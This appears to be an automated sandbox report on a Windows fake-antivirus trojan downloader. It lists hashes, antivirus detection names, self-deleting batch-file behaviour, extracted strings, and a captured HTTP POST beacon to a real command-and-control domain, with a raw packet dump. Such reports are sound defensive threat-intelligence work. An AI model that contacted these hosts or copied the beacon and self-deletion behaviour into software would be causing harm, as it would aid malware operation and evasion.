Analysis Date2014-10-08 02:40:25
MD561dc8812039bc04712057c99e899b914
SHA17f271a37395cc002540b2b4e2c2f8c70f6c1d077

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.h84h md5: 4464cf41d566f2667187ab2a53b09148 sha1: 679468d3d9f260a82898051982d7bb52de1de401 size: 18944
Section.eh27 md5: f7e4c6335266d607fa12c708c93e79aa sha1: f1c6fa5247632c947d09380ab191f2b73353c993 size: 16384
Section.dh62 md5: f29dc4fee8f81db32c190c3922f60620 sha1: 34bdb6e3cb4b6b02817bc5c18103c8d9d2971005 size: 53760
Section.ae4a md5: bf868e648a3155e947f9fc7463fb930e sha1: 6c656e7d6a7b099fb601cafa607ad68942bf77bd size: 1536
Section.rsrc md5: 5e141145ea2dd2a1b16cd5b1d5df53ea sha1: a1d3bb574691ae28c24c97df9a6a1f4d11295db8 size: 1536
Timestamp2007-05-16 23:33:21
PEhashdde107ca6d98921c5f42f78eceaa595d8fa61ed6
IMPhash9662eb3a53cf3848855081ee9b562058
AV360 SafeGen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AVAd-AwareGen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/FakeAlert.CO.gen!Eldorado
AVAvira (antivir)TR/Kazy.maklt
AVCA (E-Trust Ino)Win32/FakeAlert.AWJ
AVCAT (quickheal)Win32.Packed.Krap.ag.5
AVClamAVWin.Trojan.Fakeav-5226
AVDr. WebTrojan.Packed.706
AVEmsisoftGen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AVEset (nod32)Win32/TrojanDownloader.FakeAlert.ADA
AVFortinetW32/Kryptik.AG!tr
AVFrisk (f-prot)W32/FakeAlert.CO.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.gen!N
AVGrisoft (avg)Generic34.AUSC
AVIkarusTrojan.Win32.FakeAV
AVK7Trojan ( 00111bd81 )
AVKasperskyTrojan.Win32.FraudPack.zsn
AVMalwareBytesno_virus
AVMcafeeDownloader-BWS
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.JM
AVMicroWorld (escan)Gen:Trojan.Heur.Renos.fuW@b8Jk0Ff
AVNormanwin32/SB/Obfuscated_M
AVRisingTrojan.FraudPack!5474
AVSophosMal/Krap-D
AVSymantecPacked.Generic.268
AVTrend MicroTROJ_FAKEAV.SMOP
AVVirusBlokAda (vba32)Trojan.MTA.0230
AVYara APTno_virus
AVZillya!Trojan.FraudPack.Win32.4917

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates ProcessC:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates Filenul
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes FileC:\malware.exe

Network Details:

DNSkinoarts.com
Type: A
192.31.186.4
DNSpetroartsstudio.com
Type: A
DNSgreeartsday.com
Type: A
HTTP POSThttp://kinoarts.com/report.php?data=v26MmjSySdfyUzZ07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzbY+RtufRrKX/N/tqt+7rkA==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   6679557a 5a303741 55595272 4d375937   fyUzZ07AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   69424d46 3459476d 4c7a6259 2b527475   iBMF4YGmLzbY+Rtu
0x00000070 (00112)   6652724b 582f4e2f 7471742b 37726b41   fRrKX/N/tqt+7rkA
0x00000080 (00128)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000090 (00144)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x000000a0 (00160)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x000000b0 (00176)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000c0 (00192)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000d0 (00208)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000e0 (00224)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000f0 (00240)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x00000100 (00256)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x00000110 (00272)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000150 (00336)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000160 (00352)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000170 (00368)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000180 (00384)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000190 (00400)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x000001a0 (00416)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x000001b0 (00432)   7248413d 3d                           rHA==


Strings
..N
...q.
.DA.
A6C0
BGAC5
BH6HGB
G7876E
GAB1
H070C7
	RC_RCDATA
RC_RCDATA2
RC_RCDATA3
RC_RCDATA4
0f161f21fc4e1gc6d4ecd
{0w=>-
1}"a)T
1he8h8e0hagc9ha4bfdgdfee878c7
2}tl0T
<}4'2"
4ebb90318ag6f90c7g4d7g6g629d57
8E*4;;;
|9;:4?
9d8gfcg896629f5f3b9ce75417hehfgd95g65838bede982698g06
advapi32.dll
AppendMenuA
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
Bu'joD
CreateDirectoryA
^Cwsp.
DeleteFileW
d|<g+80H
DLT\dX
{D-M4V
Dw"k}!
D(`Ylh
]D!-Z4
e3h6be725d4f109a31a3a
eDLyJP
EDmGgT
eg6chfcdc1fe1868caddbcf3bg680bdab5821
`.eh27
etWr;G
EWmGg&
ExitProcess
ExitThread
FindClose
FreeResource
>G( -'
GetCPInfo
GetFileTime
GetFileType
GetLastError
GetPriorityClass
GetStdHandle
GetWindowTextLengthA
gggy(i
Gi.Jy47$
HeapAlloc
HeapFree
*J\S%0
kernel32.dll
lstrcatA
lstrcmpA
mLSR6$
nojK<%/
OpenFile
OpenFileMappingA
_@Os5M
qhW:pBh
RegCreateKeyA
RegQueryValueExW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
@.rsrc
:SD<D7
      </security>
      <security>
!This program cannot be run in DOS mode.
TJ<*LS@
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
{ub+8:
user32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
yD]q@$